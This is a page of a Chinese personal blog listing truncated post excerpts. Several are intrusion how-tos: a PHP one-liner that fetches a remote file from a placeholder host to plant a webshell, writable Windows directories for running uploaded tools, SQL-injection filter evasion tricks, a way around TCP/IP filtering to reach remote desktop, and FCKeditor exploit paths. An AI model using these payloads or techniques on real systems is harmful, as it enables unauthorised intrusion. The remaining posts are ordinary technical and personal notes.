p3nlhssl042.shr.prod.phx3.secureserver.net

写马不成功,phpinfo()一看

auto_prepend_file   /var/chroot/home/content/protect.php

好像会定义一个全局变量$mrno,可能是控制防护开关之类的。
这玩意肯定不是好东西,常规的copy、move上传方法不起效,导致超时。

<?php $GLOBALS["mrno"] = 0;file_put_contents('data.php',file_get_contents('http://x.com/xxxyyyzzz.txt'));?>

成功写下shel[……]

Read more

当你的webshell可传文件,没法执行,或者找不到网马的可写目录时,找以下可写目录可执行目录

recycler、temp目录就不说了,特别是有aspx的权限,找不到exe执行目录,都不好意思:

C:\windows\system32\spool\PRINTERS\
C:\WINDOWS\IIS Temporary Compressed Files\
C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files
C:\Documents and Settings\N[......]

Read more

防注入绕过必用11招

防注入绕过必用11招

1、运用编码技术绕过

如URLEncode编码,ASCII编码绕过。

例如or 1=1即

%6f%72%20%31%3d%31

而Test也可以为

CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

2、通过空格绕过

如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如

or'' swords'' =‘swords''

由于mssql的松散性,我们可以把or ”swords” 之间的空格去掉,并不影响运行。

3、运用字符串判断代替[……]

Read more

突破TCP/IP筛选到3389终端登陆方法

我们要做的就是导出他注册表的三处,更改后再导入就可以了,回到〖Wscript.Shell〗执行cmd命令:

D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"

#导出注册表里关于TCP/IP筛选的第一处

D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit[......]

Read more

Fckeditor漏洞最新整理

搜集于网络、以及个人经验

—————————————————————————————————————

1、查看编辑器版本

/fckeditor/editor/dialog/fck_about.html

2、爆绝对路径

FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)

/FC[……]

Read more

帮你解决 Windows Installer 服务不能更新一个或多个受保护的Windows 文件

今天在windowXP上先把office2003,然后安装office2007时候突然提示“Windows Installer 服务不能更新一个或多个受保护的Windows 文件”,百思不得其解,百度了一下答案千奇百出,经过几番周折,终于找出根本原因:XP系统中的某些文件被修改或者无法找到或者丢失,下面给大家分析解决一下:

1.打开C:\WINDOWS\msagent。查看您此文件中是否和下面的列举一样,否则请从后面的链接中下载包并覆盖;

2.打开C:\Program Files\Common Files\Microsoft Shared\web server extens[……]

Read more

xp下Metasploit 3.5安装出错

碰见有人问,并且我也出过同样的问题。

错误提示类似于:

Unknown error while running

C:\framework/postgresql/bin/psql.exe -U

postgres -p 7175 -h localhost -c “ALTER USER postgresql PASSWORD ‘。。。。‘
The application will exit now.

解决办法:在控制面板里把语言和地区修改为美国。重新安装就可以通过了。

 

关于爱情,出轨,小三,不忠等等问题的想法

这个是今天QQ和某同学的聊天记录,当然里面只有我的这部分了,感觉或许有用,这里记录下:

如果有美女搭讪我的话,我真未必会一直坚持住

所以最好的方法就是在对对方有感觉之前,就敬而远之

譬如在签名明显的地方放上已婚两个字

 

我平时可没这么有女人缘的

当然有可能她们找我聊时,她们自己也没有察觉到什么

这个从生物角度上讲,就是异性的优越性带来的心理上的好感

就跟雄鸟要配偶要将自己的窝装的漂亮一样

原始人跟我们不一样,女人主要需要强壮的男人,这样一是有依靠,二是后代也强壮

男人找女人呢,主要找身体强壮并且胸大的,这样才能给予[……]

Read more

Ubuntu 11.04中,chromium字体发虚,奇怪,恶心的解决办法

其实非常简单的,就是打开一个有输入框的网页,然后在输入框上右键,然后点拼写检查选项–语言设置,切换到字体与编码,然后就可以设置啦,貌似比在浏览器的选项里面提供的设置有效啊,嘎嘎。灰常简单。

 

Ubuntu11.04的设置在哪?对Ubuntu11.04的看法

Ubuntu11.04的设置居然被移到了关机按钮里面,我了个擦,这是由多么的非主流呀,或者是因为最大化的节省界面资源吧,哈哈哈,我刚刚升级完找了半天呀,亲!~~

还有啊,卡得要命,不知道为什么,而且更改设置还要花屏,要是经常用的人还是缓下再升吧,我是觉得不够太成熟,体验可以去试下。

 

第 19 页,共 22 页« 最新...10...1718192021...最旧 »